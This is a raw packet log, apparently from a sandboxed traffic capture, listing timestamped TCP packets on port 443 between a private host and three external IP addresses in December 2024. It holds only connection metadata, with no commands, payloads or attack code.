                                                                                                                                                                          Dec 9, 2024 17:53:11.992821932 CET49736443192.168.2.4104.20.3.235
                                                                                                                                                                          Dec 9, 2024 17:53:11.992849112 CET44349736104.20.3.235192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:12.212552071 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:12.212594032 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:12.212697029 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:12.212973118 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:12.212985039 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:13.623924017 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:13.624061108 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:13.629547119 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:13.629565954 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:13.629841089 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:13.630105972 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:13.630398035 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:13.671354055 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.264365911 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.264400959 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.264415979 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.265567064 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.265593052 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.269573927 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.376391888 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.376420021 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.376521111 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.376544952 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.376586914 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.420213938 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.420243979 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.420340061 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.420357943 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.420399904 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.542869091 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.542900085 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.543045998 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.543064117 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.543106079 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.571489096 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.571508884 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.571563005 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.571578979 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.571626902 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.592959881 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.592978954 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.593036890 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.593051910 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.593085051 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.646802902 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.646833897 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.646905899 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.646918058 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.646940947 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.646960974 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.725856066 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.725893974 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.725940943 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.725960016 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.726003885 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.726128101 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.741506100 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.741518021 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.741569042 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.741581917 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.741599083 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.741616964 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.756529093 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.756540060 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.756587029 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.756598949 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.756623983 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.756653070 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.771627903 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.771661043 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.771694899 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.771707058 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.771738052 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.771749020 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.782049894 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.782110929 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.782135010 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.782150984 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.782201052 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.782231092 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.793998957 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.794032097 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.794081926 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.794094086 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.794127941 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.794133902 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.906872988 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.906903982 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.906939983 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.906958103 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.906980991 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.906997919 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.916449070 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.916484118 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.916515112 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.916527033 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.916572094 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.916582108 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.924943924 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.924972057 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.925009012 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.925020933 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.925054073 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.925066948 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.932539940 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.932559967 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.932594061 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.932619095 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.932629108 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.932660103 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.941236019 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.941251993 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.941306114 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.941318989 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.941375971 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.949651957 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.949670076 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.949703932 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.949716091 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.949748039 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.957670927 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.957688093 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.957756042 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.957767963 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.957807064 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.965497971 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.965514898 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.965559959 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.965574980 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.965579033 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.965640068 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:15.099078894 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:15.099107981 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:15.099215984 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:15.099239111 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:15.099342108 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:15.104824066 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:15.104840994 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:15.104898930 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:15.104918003 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:15.104954004 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:15.104954004 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:15.110111952 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:15.110132933 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:15.110200882 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:15.110218048 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:15.110234022 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:15.110274076 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:15.116197109 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:15.116215944 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:15.116298914 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:15.116316080 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:15.116385937 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:15.119714022 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:15.119760036 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:15.119803905 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:15.119821072 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:15.119852066 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:15.119863033 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:15.120292902 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:15.120311975 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:00.659255028 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:00.659291029 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:00.659363031 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:00.676378965 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:00.676409006 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:01.979626894 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:01.979701996 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:02.065253973 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:02.065288067 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:02.065663099 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:02.065721035 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:02.069031000 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:02.115326881 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:02.631762981 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:02.631783009 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:02.631833076 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:02.631865025 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:02.631880999 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:02.631927967 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:02.677156925 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:02.677185059 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:02.677256107 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:02.677282095 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:02.677299023 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:02.677313089 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:02.826436043 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:02.826463938 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:02.826546907 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:02.826572895 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:02.826589108 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:02.826611996 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:02.857567072 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:02.857592106 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:02.857675076 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:02.857706070 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:02.857731104 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:02.857812881 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:02.887826920 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:02.887846947 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:02.887934923 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:02.887964010 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:02.888052940 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:02.913794041 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:02.913814068 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:02.913892984 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:02.913922071 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:02.913947105 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:02.913968086 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.028860092 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.028871059 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.028934956 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.028956890 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.028995991 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.029098988 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.048707008 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.048731089 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.048815012 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.048830032 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.049057961 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.070050001 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.070087910 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.070127010 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.070154905 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.070180893 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.070219994 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.091450930 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.091480017 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.091593027 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.091619015 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.091825008 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.109710932 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.109751940 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.109778881 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.109797001 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.109824896 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.109843969 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.131254911 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.131284952 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.131375074 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.131405115 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.132740021 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.215224028 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.215250969 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.215329885 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.215354919 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.215404987 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.228816986 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.228844881 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.228894949 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.228909969 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.228933096 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.228955030 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.243268013 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.243292093 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.243372917 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.243381977 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.243491888 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.256716967 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.256735086 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.256799936 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.256807089 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.256995916 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.266676903 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.266693115 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.266755104 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.266761065 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.266804934 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.273346901 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.273361921 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.273417950 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.273425102 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.273482084 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.280549049 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.280564070 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.280632973 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.280647039 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.281074047 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.287959099 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.287976027 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.288026094 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.288033009 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.288089037 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.411927938 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.411959887 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.412003994 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.412039995 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.412067890 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.412082911 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.417598963 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.417615891 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.417666912 CET49824443192.168.2.4107.167.96.30
